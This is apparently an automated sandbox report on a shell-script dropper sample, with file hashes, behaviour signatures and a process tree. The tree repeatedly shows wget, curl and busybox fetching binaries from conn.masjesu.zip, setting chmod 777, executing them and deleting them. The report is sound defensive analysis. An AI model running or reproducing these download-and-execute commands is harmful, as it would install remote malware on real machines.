Analysis
-
max time kernel
150s -
max time network
155s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
28/10/2024, 02:20
Static task
static1
Behavioral task
behavioral1
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
-
Size
10KB
-
MD5
a5dec9cd68c75301d742f7bf9789c4f8
-
SHA1
24ee3d00677e483eae3654f0eab7a2a06e912288
-
SHA256
32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1
-
SHA512
0d552f2f17ef3eb821b94288c9fd717568161003de257fd488b93a41c02257759480e52b93d5d19fee1311a87d6b6136233520c17351af772d5b2ccc6311f9b4
-
SSDEEP
192:nXbslV5d8Mv+SUMyCP8okpm79NzTaBVpc8Mv+S2XbslV1yCP8okzvzTaBV2:nXbslV5d8Mv+SUMyCP8oom79Mc8Mv+SW
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 21 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 768 chmod 820 chmod 878 chmod 885 chmod 893 chmod 907 chmod 960 chmod 734 chmod 923 chmod 953 chmod 742 chmod 796 chmod 900 chmod 931 chmod 749 chmod 827 chmod 834 chmod 857 chmod 915 chmod 938 chmod 946 chmod -
Executes dropped EXE 21 IoCs
ioc pid Process /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 735 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd 743 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX 750 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 770 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme 797 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc 821 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB 828 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N 836 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS 858 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G 879 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ 886 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 894 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly 901 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 908 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 916 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 924 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd 932 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX 939 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme 947 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS 954 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G 961 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 757 curl 884 busybox 903 wget 934 wget 741 busybox 823 wget 943 curl 950 curl 963 wget 730 busybox 765 busybox 841 wget 892 busybox 942 wget 949 wget 956 wget 711 wget 824 curl 906 busybox 922 busybox 877 busybox 899 busybox 959 busybox 748 busybox 753 wget 783 curl 920 curl 952 busybox 957 curl 803 wget 904 curl 869 curl 881 wget 897 curl 911 wget 919 wget 935 curl 775 wget 830 wget 831 curl 896 wget 914 busybox 719 curl 882 curl 945 busybox 791 busybox 812 curl 819 busybox 846 curl 854 busybox 862 wget 826 busybox 912 curl 926 wget 739 curl 746 curl 927 curl 930 busybox 937 busybox 737 wget 745 wget 833 busybox 889 wget 890 curl -
Writes file to tmp directory 21 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX curl File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc curl File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB curl File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N curl File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 curl File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme curl File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS curl File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd curl File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme curl File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly curl File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 curl File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS curl File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G curl File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ curl File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 curl File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd curl File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 curl File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 curl File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 curl File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX curl File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G curl
Processes
-
/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:711
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:719
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:730
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:736
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- System Network Configuration Discovery
PID:737
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- System Network Configuration Discovery
PID:741
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:744
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- System Network Configuration Discovery
PID:745
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:752
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:753
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:765
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:773
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- System Network Configuration Discovery
PID:775
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- System Network Configuration Discovery
PID:791
-
-
/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:802
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- System Network Configuration Discovery
PID:803
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- System Network Configuration Discovery
PID:819
-
-
/bin/chmodchmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc2⤵PID:822
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- System Network Configuration Discovery
PID:823
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- System Network Configuration Discovery
PID:826
-
-
/bin/chmodchmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB2⤵PID:829
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- System Network Configuration Discovery
PID:830
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- System Network Configuration Discovery
PID:833
-
-
/bin/chmodchmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N2⤵PID:839
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- System Network Configuration Discovery
PID:841
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- System Network Configuration Discovery
PID:854
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:877
-
-
/bin/chmodchmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ2⤵PID:888
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- System Network Configuration Discovery
PID:889
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- System Network Configuration Discovery
PID:892
-
-
/bin/chmodchmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv752⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- System Network Configuration Discovery
PID:899
-
-
/bin/chmodchmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm982⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW52⤵PID:918
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:919
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- System Network Configuration Discovery
PID:922
-
-
/bin/chmodchmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ92⤵PID:925
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- System Network Configuration Discovery
PID:930
-
-
/bin/chmodchmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd2⤵PID:933
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- System Network Configuration Discovery
PID:937
-
-
/bin/chmodchmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- System Network Configuration Discovery
PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
